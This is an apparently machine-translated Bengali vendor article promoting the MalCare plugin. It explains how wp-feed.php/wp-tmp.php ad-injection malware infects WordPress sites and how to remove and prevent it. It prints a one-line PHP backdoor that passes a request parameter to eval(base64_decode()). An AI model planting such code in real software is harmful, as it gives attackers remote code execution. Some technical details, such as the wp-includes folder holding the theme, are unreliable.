আপনার ম্যালওয়্যার স্ক্যানার কি আপনাকে সতর্ক করছে যে "আপনার সাইট হ্যাক হয়েছে" কিন্তু এটি আপনার কাছে ঠিক দেখাচ্ছে?
দর্শকরা কি আপনার ওয়ার্ডপ্রেস ওয়েবসাইটে স্প্যাম বিজ্ঞাপনের বিষয়ে অভিযোগ করছেন কিন্তু আপনি কোনো দেখতে পাচ্ছেন না?
আপনার সাইট হ্যাক হওয়ার একটি ভাল সম্ভাবনা রয়েছে৷
৷হ্যাকাররা তাদের হ্যাক ছদ্মবেশী করার চতুর উপায় খুঁজে পায় সাইট মালিকদের কাছ থেকে যাতে তারা সনাক্ত না হয় এবং তারা দীর্ঘ সময়ের জন্য ওয়েবসাইট শোষণ চালিয়ে যেতে পারে।
wp-feed.php সেখানে সবচেয়ে চতুরভাবে ছদ্মবেশী হ্যাক এক.
সাইটের মালিকদের থেকে লুকানো, এটি আপনার দর্শকদের কাছে অবৈধ পণ্য, ওষুধ এবং প্রাপ্তবয়স্ক সামগ্রীর বিজ্ঞাপন প্রদর্শন করে৷
এমনকি আপনি যদি এটি সনাক্ত করতে সক্ষম হন, তবে সংক্রমণ ছড়িয়ে পড়েছে এমন সমস্ত জায়গা খুঁজে পাওয়া কেবল কঠিনই নয়, কখনও কখনও অসম্ভব। সংক্রমণ অপসারণ জটিল এবং কঠিন। আপনি যদি এটি অপসারণ করতে পরিচালনা করেন, 10টির মধ্যে 8টি ক্ষেত্রে, সংক্রমণটি আবার দেখা দেয়।
নীচের লাইন:একটি ওয়ার্ডপ্রেস ওয়েবসাইট থেকে wp-feed.php সংক্রমণ অপসারণ করা কঠিন।
সৌভাগ্যবশত, আমরা এর আগে অসংখ্যবার এই ম্যালওয়্যারের সাথে মোকাবিলা করেছি। গত এক দশকে, আমরা শত শত এবং হাজার হাজার ওয়ার্ডপ্রেস ওয়েবসাইট থেকে শুধুমাত্র সফলভাবে wp-feed মুছে ফেলিনি, আবার সংক্রমণ প্রতিরোধও করেছি।
চিন্তা করবেন না। আপনি ভাল হাতে আছেন।
এই নিবন্ধে, আপনি শিখবেন:
- কীভাবে wp-feed.php ম্যালওয়্যার কাজ করে এবং কীভাবে এটি আপনার ওয়েবসাইটকে প্রভাবিত করে
- কিভাবে আপনার সাইট থেকে এটি সরাতে হয়
- ভবিষ্যতে কিভাবে পুনরায় সংক্রমণ প্রতিরোধ করা যায়
TL;DR : wp-feed.php সংক্রমণ অপসারণ করতে, আপনাকে শুধু আমাদের ইনস্টল করতে হবে ওয়ার্ডপ্রেস ম্যালওয়্যার অপসারণ এবং অটো-ক্লিন ফাংশন চালান। প্লাগইনটি ওয়েবসাইটের পিছনের দরজাগুলি সরিয়ে পুনরায় সংক্রমণ প্রতিরোধে সহায়তা করে যা পুনঃসংক্রমণ সক্ষম করে এবং ফায়ারওয়াল এবং লগইন সুরক্ষা দিয়ে আপনার সাইট অ্যাক্সেস করা থেকে দূষিত ট্র্যাফিক ব্লক করে৷
wp-feed.php এবং wp-tmp.php কি? (কারণ, উপসর্গ এবং পুনরায় সংক্রমণ)
সংক্ষেপে: WP-Feed হল এক ধরনের ম্যালওয়্যার যা ওয়েবসাইটে দূষিত বিজ্ঞাপন প্রদর্শন করে। লক্ষ্য হল আপনার দর্শকদের বিজ্ঞাপনে ক্লিক করা এবং তাদের একটি দূষিত ওয়েবসাইটে পুনঃনির্দেশ করা।
আপনি নিশ্চয়ই ভাবছেন –
> কিভাবে আমার ওয়েবসাইট সংক্রমিত হল?
সংক্রমণটি সাধারণত নালড প্লাগইন বা থিম ব্যবহারের কারণে ঘটে .
Nulled সফ্টওয়্যার ব্যবহার করতে লোভনীয় কারণ তারা আপনাকে বিনামূল্যে প্রিমিয়াম বৈশিষ্ট্য অফার করে৷ অনেকে বিশ্বাস করেন যে নালড সফ্টওয়্যারগুলি উপকারের একটি কাজ হিসাবে বিতরণ করা হয়।
এটি সাধারণত কেস থেকে অনেক দূরে। শূন্য সফ্টওয়্যার বিতরণ করা হয় যাতে হ্যাকাররা আপনার সাইটে অনায়াসে অ্যাক্সেস পেতে পারে৷
নালড প্লাগইন বা থিম ম্যালওয়্যার দিয়ে ভরা। আপনি যখন আপনার ওয়েবসাইটে একটি nulled থিম বা প্লাগইন ইনস্টল করেন, তখন আপনি মূলত হ্যাকারদের জন্য আপনার সাইট অ্যাক্সেস করার দরজা খুলে দেন।
বাতিল করা সফ্টওয়্যার ছাড়াও, সেকেলে প্লাগইন এবং থিম এছাড়াও দুর্বল হতে পারে। হ্যাকাররা আপনার সাইটে প্রবেশ করার জন্য এই দুর্বলতাগুলিকে কাজে লাগায়।
এছাড়াও তারা দুর্বল ব্যবহারকারীর নাম এবং পাসওয়ার্ড ব্যবহার করে যেমন "অ্যাডমিন" এবং "p@ssword।" দুর্বল শংসাপত্র অনুমান করা সহজ.
একজন হ্যাকার আপনার ব্যবহারকারীর নাম এবং লগইন অনুমান করতে পারে এবং সরাসরি আপনার ওয়েবসাইটে wp-feed.php ম্যালওয়্যার স্থাপন করতে পারে।
> হ্যাকাররা কেন wp-feed.php দিয়ে সাইটগুলিকে সংক্রমিত করে?
লক্ষ্য হল আপনার দর্শকদের চুরি করা এবং তাদের জাল পরিষেবা বা পণ্য কেনার জন্য প্রতারিত করা যাতে হ্যাকাররা উপার্জন করতে পারে।
সত্যই আশ্চর্যজনক বিষয় হল কিভাবে তারা প্রায়শই সাইটের মালিকের একটি ইঙ্গিত না পেয়ে এটি অর্জন করতে সক্ষম হয়।
যা আমাদের প্রশ্নে নিয়ে আসে –
> কেন এই সংক্রমণের লক্ষণগুলি লক্ষ্য করা কঠিন?
একবার হ্যাকাররা আপনার ওয়েবসাইটে অ্যাক্সেস পেয়ে গেলে, তারা আপনার wp-includes ফোল্ডারে দুটি ফাইল (wp-feed.php এবং wp-tmp.php) স্থাপন করে।
wp-includes ফোল্ডারটি আপনার ওয়ার্ডপ্রেস কোরের অংশ। এটি যেখানে আপনার ওয়েবসাইটের থিম অবস্থিত।
WP ফিড ফাইল অন্যান্য ওয়ার্ডপ্রেস ফাইল, বিশেষ করে function.php, যেটি আপনার সক্রিয় থিমের অংশ, সংক্রমিত হতে শুরু করে।
function.php এর মধ্যে থেকে, হ্যাকাররা আপনার ওয়ার্ডপ্রেস ওয়েবসাইটে দূষিত পপআপ বিজ্ঞাপন প্রদর্শন করতে সক্ষম।
যদিও সত্যিকারের অপ্রীতিকর অংশটি হল যে বিজ্ঞাপনগুলি শুধুমাত্র নতুন দর্শকদের দেখানো হয়৷ , পুনরাবৃত্তি দর্শক না. শুধুমাত্র নতুন দর্শকদের বিজ্ঞাপন দেখানো হয়েছে তা নিশ্চিত করতে ম্যালওয়্যার আপনার সাইটে দর্শকদের রেকর্ড করে। এটি সনাক্তকরণ প্রতিরোধ করার একটি বুদ্ধিমান উপায়।
তাই আপনি, আপনার নিজের সাইটে ঘন ঘন ভিজিটর হিসাবে, হ্যাকের কোনো লক্ষণ লক্ষ্য করবেন না।
কিভাবে wp-feed.php ম্যালওয়্যার পরিষ্কার করবেন?
সংক্রমণ অপসারণের দুটি উপায় আছে। সেগুলো হল –
1. একটি প্লাগইন ব্যবহার করা (সহজ)
২. এটি ম্যানুয়ালি করা (কঠিন)
আসুন প্রতিটি পদ্ধতিতে ডুব দেওয়া যাক।
1. একটি প্লাগইন দিয়ে WP-Feed.php ম্যালওয়্যার অপসারণ (সহজ উপায়)
আপনার কারো কারো হয়তো আপনার ওয়েবসাইটে ইতিমধ্যেই একটি নিরাপত্তা প্লাগইন ইনস্টল করা আছে। সম্ভবত এই প্লাগইনটি আপনাকে দূষিত ফাইল সম্পর্কে সতর্ক করেছিল – wp-includes/wp-feed.php এবং wp-includes/wp-tmp.php .
বেশিরভাগ সিকিউরিটি প্লাগইন ম্যালওয়্যার রিমুভাল সার্ভিস অফার করে, কিন্তু খুব কম লোকই ম্যালকেয়ার সিকিউরিটির মত দ্রুত এবং কার্যকরীভাবে এটি করতে পারে।
- MalCare আপনার সাইট 60 সেকেন্ডের মধ্যে পরিষ্কার করবে . আপনাকে টিকিট বাড়াতে হবে না। আপনাকে সারিতে অপেক্ষা করতে হবে না। আপনাকে আপনার সাইটের শংসাপত্রগুলি তৃতীয় পক্ষের প্লাগইনের কাছে হস্তান্তর করতে হবে না।
- শুধু তাই নয়, প্লাগইনটি লুকানো ম্যালওয়্যার খুঁজতে গিয়ে প্রতিটি কোণে এবং তার বাইরে চলে যায়। এটি প্রতিটি একক ক্ষতিকারক স্ক্রিপ্ট খুঁজে পায়৷ আপনার সাইটে উপস্থাপন করুন৷
- এটি নতুন এবং ভাল-লুকানো ম্যালওয়্যার সনাক্ত করতে অ-প্রথাগত পদ্ধতি ব্যবহার করে . এটি দূষিত অভিপ্রায় সনাক্ত করতে কোডের আচরণকে পুঙ্খানুপুঙ্খভাবে বিশ্লেষণ করে। এটি নিশ্চিত করতেও সাহায্য করে যে এটি ভাল কোডকে খারাপ হিসেবে চিহ্নিত করছে না .
- এটি কয়েক মিনিটের ব্যবধানে সেই সব করে .
আসুন ম্যালকেয়ার দিয়ে wp-feed.php সংক্রমণ পরিষ্কার করি।
ধাপ 1: আপনার ওয়ার্ডপ্রেস ওয়েবসাইটে MalCare সিকিউরিটি ইনস্টল এবং সক্রিয় করুন।
ধাপ 2: আপনার ড্যাশবোর্ড মেনু থেকে, MalCare নির্বাচন করুন। আপনার ইমেল ঠিকানা লিখুন এবং Secure Site Now-এ ক্লিক করুন .
ধাপ 3: পরবর্তী পৃষ্ঠায়, আপনাকে একটি পাসওয়ার্ড লিখতে বলা হবে এবং তারপর আপনার URL লিখুন .
MalCare অবিলম্বে আপনার ওয়েবসাইট স্ক্যান করা শুরু হবে. উদ্দেশ্য আপনার ওয়েবসাইটে উপস্থিত দূষিত কোডের প্রতিটি একক উদাহরণ খুঁজে বের করা।
এর মানে, এটি শুধুমাত্র wp-feed.php এবং wp-tmp.php ফাইলগুলি সনাক্ত করবে না, কিন্তু সমস্ত দূষিত কোড আপনার ওয়ার্ডপ্রেস ফাইলগুলিকে সংক্রামিত করবে, যার মধ্যে function.php ফাইলের মধ্যে লুকিয়ে থাকা উদাহরণগুলি সহ।
আপনি নিশ্চিন্ত থাকতে পারেন যে প্লাগইনটি আপনার সাইটে উপস্থিত প্রতিটি একক ব্যাকডোরও খুঁজে পাবে, যাতে পুনরায় সংক্রমণ প্রতিরোধ করা যায়।
দূষিত স্ক্রিপ্টগুলি খুঁজে পাওয়ার পরে, প্লাগইনটি আপনাকে এটি সম্পর্কে সতর্ক করবে৷
এর পরে, আপনাকে আপনার সাইটটি পরিষ্কার করতে হবে।
দয়া করে নোট করুন যে ম্যালকয়ারের ম্যালওয়্যার অপসারণ একটি প্রিমিয়াম বৈশিষ্ট্য। এটির শুধু তাত্ক্ষণিক ম্যালওয়্যার অপসারণ প্লাগইন আছে। বছরে $99 এর জন্য, আপনি যতবার চান একটি সাইট পরিষ্কার করতে পারেন এবং আপনার সম্ভাব্য সর্বোত্তম সুরক্ষা সম্পর্কে নিশ্চিত হন৷ সম্পর্কে আরও জানুন MalCare মূল্য
পদক্ষেপ 4: আপনার ওয়েবসাইট থেকে wp-feed.php-এর প্রতিটি ট্রেস মুছে ফেলতে, আপনাকে যা করতে হবে তা হল স্বয়ংক্রিয়-পরিষ্কার-এ ক্লিক করুন। বোতাম।
MalCare অবিলম্বে আপনার সাইট পরিষ্কার করা শুরু হবে.
এটাই, লোকেরা। এইভাবে আপনি একটি প্লাগইন দিয়ে আপনার ওয়েবসাইট পরিষ্কার করেন।
2. ম্যানুয়ালি WP-Feed.php ম্যালওয়্যার সরান (কঠিন উপায়)
ম্যানুয়ালি সংক্রমণ অপসারণ করা মোটামুটি চ্যালেঞ্জিং, কারণ, এই ধরনের সংক্রমণে, অনেকগুলি চলমান টুকরা থাকে।
- হ্যাকার দুটি ক্ষতিকারক ফাইল আপলোড করে - wp-feed.php এবং wp-tmp.php৷ আপনি শুরু করতে তাদের অপসারণ করতে হবে. এটি সম্ভবত একমাত্র সহজ বিট।
- সংক্রমণটি function.php ফাইল সহ অন্যান্য ওয়ার্ডপ্রেস ফাইলে ছড়িয়ে পড়েছে। এটি কঠিন, কারণ সংক্রমণ কোথায় ছড়িয়েছে তা কে বলতে পারে।
- সমস্ত দূষিত কোড খুঁজে পেতে আপনার ঘন্টা সময় লাগবে।
- দূষিত কোড শনাক্ত করা কঠিন কারণ সেগুলি ভাল ছদ্মবেশে এবং দেখতে সাধারণ কোডের টুকরোগুলির মতো৷
- কিছু পরিচিত ক্ষতিকারক কোড, যেমন “eval(base64_decode)”, বৈধ প্লাগইনগুলির অংশ হতে পারে। তারা একটি দূষিত উপায়ে ব্যবহার করা হয় না. তাই, কোড মুছে ফেলা আপনার প্লাগইনকে প্রভাবিত করবে এবং এমনকি আপনার সাইটটি ভেঙে যেতে পারে।
- এমন একটি মোটামুটি ভাল সুযোগ রয়েছে যে আপনি কোডের টুকরোগুলি মিস করবেন যা পুনরায় সংক্রমণের দিকে পরিচালিত করতে পারে৷
ম্যানুয়াল অপসারণ, তাই, সব কার্যকর নয়.
যাইহোক, আপনি যদি এখনও এটি করতে চান তবে আপনার ওয়েবসাইটের সম্পূর্ণ ব্যাকআপ নিন। আপনি যদি দুর্ঘটনাক্রমে কিছু মুছে ফেলেন এবং আপনার সাইটটি ভেঙে ফেলেন, আপনি দ্রুত এটিকে স্বাভাবিক অবস্থায় ফিরিয়ে আনতে পারেন।
এখানে সেরা ব্যাকআপ পরিষেবাগুলির একটি তালিকা রয়েছে যা আপনি বেছে নিতে পারেন৷
এবং এখানে একটি নিবন্ধ যা আপনাকে ম্যালওয়্যার ম্যানুয়ালি অপসারণ করতে সাহায্য করবে - ওয়ার্ডপ্রেস হ্যাক হয়েছে। শুধু "কিভাবে হ্যাক করা ওয়ার্ডপ্রেস ওয়েবসাইট ম্যানুয়ালি পরিষ্কার করবেন"-এ যান বিভাগ।
আপনার ওয়েবসাইট এখন সংক্রমণ মুক্ত, কিন্তু এটি নিরাপদ থেকে অনেক দূরে। হ্যাকাররা এখনও আপনার সাইট টার্গেট করতে পারে এবং এটিকে সংক্রমিত করার চেষ্টা করতে পারে। আপনাকে নিশ্চিত করতে হবে যে আপনার সাইট ভবিষ্যতে সংক্রমণ থেকে সুরক্ষিত। তবে আমরা এটিতে প্রবেশ করার আগে, আসুন wp-feed.php এবং wp-tmp.php সংক্রমণের প্রভাবগুলি দেখে নেওয়া যাক।
wp-temp.php ম্যালওয়্যার সংক্রমণের প্রভাব
বলা বাহুল্য যে wp-feed.php &wp-tmp.php ম্যালওয়্যারের উপস্থিতি আপনার ওয়েবসাইটে বিধ্বংসী প্রভাব ফেলতে পারে৷
যে ওয়েবসাইটগুলি wp-temp.php দ্বারা সংক্রামিত হয়েছে সেগুলি প্রায়শই নিম্নলিখিত ফলাফলগুলি ভোগ করবে:
- আপনি একটি বাউন্স রেট লক্ষ্য করবেন এবং একটি সময় দর্শকদের হ্রাস আপনার ওয়েবসাইটে ব্যয় করুন।
- পপআপ বিজ্ঞাপনগুলি আপনার ওয়েবসাইটকে ভারী এবং সত্যিই ধীর করে তুলবে .
- কেউ একটি ধীর ওয়েবসাইট পছন্দ করে না, তাই দর্শকরা সম্ভবত ব্যাক বোতাম টিপুন ব্রাউজারে আপনার পেজ লোড হওয়ার আগে। এটির একটি ডমিনো প্রভাব থাকবে৷ ৷
- সার্চ ইঞ্জিনগুলি লক্ষ্য করবে যে লোকেরা কত দ্রুত আপনার সাইট ছেড়ে যাচ্ছে। তারা উপসংহারে আসবে যে ব্যবহারকারীরা যা খুঁজছেন তা আপনি অফার করছেন না। আপনার সার্চ ইঞ্জিন র্যাঙ্কিং পড়ে যাবে .
- এর অর্থ হল সমস্ত প্রচেষ্টা, সময় এবং অর্থ আপনি হয়ত SERPs-এ উচ্চতর স্থান পেতে খরচ করেছেন নষ্ট হয় .
- হ্যাক করা ওয়েবসাইটগুলি কালো তালিকাভুক্ত Google দ্বারা এবং স্থগিত করা হয়েছে ৷ হোস্টিং প্রদানকারীদের দ্বারা। এছাড়াও, যদি হ্যাক করা সাইটগুলি গুগল বিজ্ঞাপন চালায় তবে অ্যাডওয়ার্ড অ্যাকাউন্ট সাসপেন্ড করা হবে। এই সব যানজট আরো তলিয়ে যাবে.
- আরও, হ্যাক করা ওয়েবসাইটগুলিকে পরিষ্কার করতে হবে যা একটি ব্যয়বহুল ব্যাপার হতে পারে। আপনি যদি সঠিক টুল ব্যবহার না করেন।
ভাল খবর আপনি জানেন যে আপনার সাইট হ্যাক করা হয়েছে. অতএব আপনি এটি পরিষ্কার এবং প্রভাব বন্ধ করতে পারেন।
ভবিষ্যতে wp-feed.php ম্যালওয়্যার থেকে কিভাবে আপনার সাইটকে রক্ষা করবেন?
আমাদের অনেক পাঠক হয়তো তাদের সাইট থেকে wp-feed.php ম্যালওয়্যার অপসারণের চেষ্টা করেছেন, শুধুমাত্র এটি আবিষ্কার করার জন্য যে ম্যালওয়্যারটি ফিরে আসছে।
এটি ঘটে কারণ আপনার সাইটে একটি ব্যাকডোর ইনস্টল করা আছে। বেশিরভাগ পিছনের দরজাগুলি অত্যন্ত ভাল ছদ্মবেশী, এতটাই যে সেগুলি অপেশাদার বিকাশকারীদের দ্বারা বৈধ কোড হিসাবে পাস করা যেতে পারে।
আগের একটি বিভাগে, আমরা ব্যাখ্যা করেছি যে হ্যাকাররা আপনার ওয়েবসাইটের কোডে দুটি ফাইল, wp-feed.php এবং wp-tmp.php সন্নিবেশ করে। wp-tmp.php ফাইলটি ব্যাকডোর হিসেবে কাজ করে। আপনি ফাইলটি খুললে, আপনি একটি স্ক্রিপ্ট পাবেন যা দেখতে এরকম কিছু –
$p = $REQUEST$#91;”m”]; eval(base64_decode ($p));
ভাল খবর হল যে আপনি নিম্নলিখিত ব্যবস্থাগুলি গ্রহণ করে আপনার সাইটকে ভবিষ্যতে হ্যাক করার প্রচেষ্টা থেকে রক্ষা করতে পারেন –
1. বাতিল সফ্টওয়্যার মুছুন এবং সেগুলি ব্যবহার করা বন্ধ করুন
আপনি যদি আপনার ওয়েবসাইটে একটি বাতিল প্লাগইন বা থিম ব্যবহার করেন, এটি অবিলম্বে মুছুন .
হ্যাকাররা প্রথমে শূন্য সফ্টওয়্যার ব্যবহার করে আপনার সাইটে অ্যাক্সেস পেয়েছে। আপনি আপনার সাইট যতই ভালোভাবে পরিষ্কার করুন না কেন, আপনি যদি বাতিল করা সফ্টওয়্যারটি সরিয়ে না দেন, হ্যাকাররা আপনার সাইটে তাদের পথ খুঁজে বের করবে এবং ম্যালওয়্যার স্থাপন করবে।
আপনি যদি আপনার ব্যবহারকারীদের প্লাগইন এবং থিম ইনস্টল করার অনুমতি দিয়ে থাকেন, তবে নিশ্চিত করুন যে তারা কখনই বাতিল সফ্টওয়্যার ব্যবহার করবেন না।
আসলে, পুরোপুরি প্লাগইন এবং থিম ইনস্টল করা প্রতিরোধ করার অনুশীলন করা ভাল ম্যালকয়ারের সাহায্যে।
আপনাকে যা করতে হবে তা হল MalCare-এর ড্যাশবোর্ডে লগ ইন করুন, আপনার ওয়েবসাইট নির্বাচন করুন, Apply Hardening-এ ক্লিক করুন। , এবং ব্লক প্লাগইন/থিম সক্ষম করুন৷ ইনস্টলেশন।
2. আপনার সাইটের নিরাপত্তাকে কঠোর করুন
আপনি ফাইলের অনুমতি পরিবর্তন করে আপনার ওয়ার্ডপ্রেস ফোল্ডারে wp-feed.php এর মতো দূষিত ফাইল স্থাপন করা থেকে হ্যাকারদের আটকাতে পারেন .
ফাইল অনুমতি হল নিয়মের একটি সেট যা নির্ধারণ করে যে কে কোন ফাইলগুলি অ্যাক্সেস করতে পারবে। আপনি wp-includes ফোল্ডারে পরিবর্তন করা থেকে ব্যবহারকারীদের ব্লক করতে পারেন। আরও গভীরে ফাইলের অনুমতিগুলি বুঝতে, এই নির্দেশিকাটি দেখুন:ওয়ার্ডপ্রেস ফাইল অনুমতি৷
আপনি ফাইল সম্পাদক নিষ্ক্রিয় করে আপনার থিম পরিবর্তন করা থেকে হ্যাকারদের ব্লক করতে পারেন . এটি তাদের আপনার ওয়েবসাইটে পপ-আপ বিজ্ঞাপনগুলি ইনজেক্ট করা থেকে বাধা দেবে৷ আপনি এটি ম্যানুয়ালি করতে পারেন তবে এটি ঝুঁকিপূর্ণ এবং সুপারিশ করা হয় না।
আপনি যদি আপনার সাইটে ইতিমধ্যেই MalCare ইনস্টল করে থাকেন, তাহলে আপনাকে যা করতে হবে তা হল ফাইল এডিটর নিষ্ক্রিয় করতে একটি বোতামে ক্লিক করুন৷
ওয়ার্ডপ্রেস হার্ডনিং সম্পর্কে আরও জানুন।
3. আপনার ওয়েবসাইট আপডেট রাখুন
অন্যান্য সফ্টওয়্যারের মতো, ওয়ার্ডপ্রেস প্লাগইন এবং থিমগুলি দুর্বলতা বিকাশ করে। বিকাশকারীরা যখন এই দুর্বলতা সম্পর্কে জানতে পারে, তারা দ্রুত একটি প্যাচ তৈরি করে এবং এটি একটি আপডেট আকারে প্রকাশ করে।
আপডেট বাস্তবায়নে কোনো বিলম্ব হলে, এটি আপনার সাইটকে ঝুঁকির মধ্যে ফেলে।
হ্যাকাররা দুর্বলতাকে কাজে লাগাতে পারে . প্রকৃতপক্ষে, তারা সর্বদা দুর্বলতা সহ ওয়েবসাইটগুলির সন্ধানে থাকে যাতে তারা সাইটটিতে অ্যাক্সেস পেতে এবং সাইটটিকে ম্যালওয়্যার দ্বারা সংক্রামিত করতে এটি ব্যবহার করতে পারে৷
অতএব, আপডেট দেরি করবেন না।
আপনি এখান থেকে নিরাপত্তা আপডেট সম্পর্কে আরও জানতে পারেন – ওয়ার্ডপ্রেস নিরাপত্তা আপডেট।
এখানে একটি গাইড রয়েছে যা আপনাকে আপনার সাইট আপডেট রাখতে সাহায্য করবে – কিভাবে ওয়ার্ডপ্রেস আপডেট করবেন।
4. শক্তিশালী শংসাপত্রের ব্যবহার প্রয়োগ করুন
আপনার ওয়েবসাইটে অ্যাক্সেস পাওয়ার সবচেয়ে সহজ উপায় হল আপনার লগইন পৃষ্ঠার মাধ্যমে।
হ্যাকারকে সফলভাবে আপনার ব্যবহারকারীর শংসাপত্রগুলি অনুমান করতে হবে। প্রকৃতপক্ষে, তারা এমন বট ডিজাইন করে যা কয়েক মিনিটের মধ্যে শত শত ব্যবহারকারীর নাম এবং পাসওয়ার্ডের সংমিশ্রণ চেষ্টা করতে পারে। আপনি বা আপনার সতীর্থদের কেউ যদি "অ্যাডমিন" এবং "পাসওয়ার্ড123" এর মতো সহজে অনুমানযোগ্য শংসাপত্র ব্যবহার করে থাকেন, তবে আপনার সাইটটি লঙ্ঘন করতে বটগুলিকে 2 সেকেন্ড সময় লাগবে। একে বলা হয় নৃশংস শক্তি আক্রমণ।
আপনার ওয়েবসাইটের প্রতিটি ব্যবহারকারী অনন্য ব্যবহারকারীর নাম এবং শক্তিশালী পাসওয়ার্ড ব্যবহার করে তা নিশ্চিত করা গুরুত্বপূর্ণ।
এমনকি আপনি এটির বাইরেও যেতে পারেন এবং আপনার লগইন পৃষ্ঠাকে সুরক্ষিত করতে বেশ কয়েকটি ব্যবস্থা বাস্তবায়ন করতে পারেন। আমরা ওয়ার্ডপ্রেস লগইন নিরাপত্তা ব্যবস্থার একটি তালিকা সংকলন করেছি যা আপনি নিতে পারেন।
5. ফায়ারওয়াল ব্যবহার করুন
আপনি যদি হ্যাকারদের প্রথম স্থানে আপনার ওয়েবসাইটে অবতরণ করতে বাধা দিতে পারেন তবে এটি কি দুর্দান্ত হবে না?
একটি ফায়ারওয়াল হল আপনার প্রয়োজনীয় টুল।
এটি ট্রাফিক তদন্ত করে যে আপনার সাইটে অ্যাক্সেস পেতে চায়. যদি এটি সনাক্ত করে যে ট্র্যাফিকটি একটি দূষিত IP ঠিকানা থেকে উদ্ভূত হয়েছে, ফায়ারওয়াল অবিলম্বে ট্র্যাফিক ব্লক করে।
এইভাবে, এটি হ্যাকার এবং বটগুলিকে ফিল্টার করে।
এখানে সেরা ওয়ার্ডপ্রেস ফায়ারওয়ালগুলির একটি তালিকা রয়েছে যা আপনি আপনার সাইটে সক্রিয় করতে পারেন।
যাইহোক, আপনি যদি MalCare ব্যবহার করেন, তাহলে আপনার সাইটে ইতিমধ্যেই একটি ফায়ারওয়াল সক্রিয় করা আছে।
এরপর কি?
আমরা আপনাকে দেখিয়েছি কিভাবে আপনার সাইট পরিষ্কার করতে হয় এবং কিভাবে নিশ্চিত করা যায় যে আপনি আর কখনো হ্যাক না হন।
একটি উপদেশ যা আমরা মনে করি আপনার ওয়েবসাইটকে অনেক বিপর্যয় থেকে বাঁচাবে তা হল – আপনার ওয়েবসাইটের নিয়মিত ব্যাকআপ নিন।
আপনার ওয়েবসাইট হঠাৎ করে কোনো ত্রুটি ছুঁড়ে ফেলছে বা এটি ভেঙে গেছে কিনা, একটি ব্যাকআপ আপনাকে দ্রুত আপনার সাইটকে সাময়িকভাবে ঠিক করতে সাহায্য করবে।
আপনি যদি MalCare সিকিউরিটি সাবস্ক্রাইব করেন, আপনি অতিরিক্ত চার্জের জন্য একটি ব্যাকআপ অ্যাডনও পেতে পারেন। আরও জানতে আমাদের সাথে যোগাযোগ করুন।
দেন MalCare নিরাপত্তা প্লাগইন একটি স্পিন!
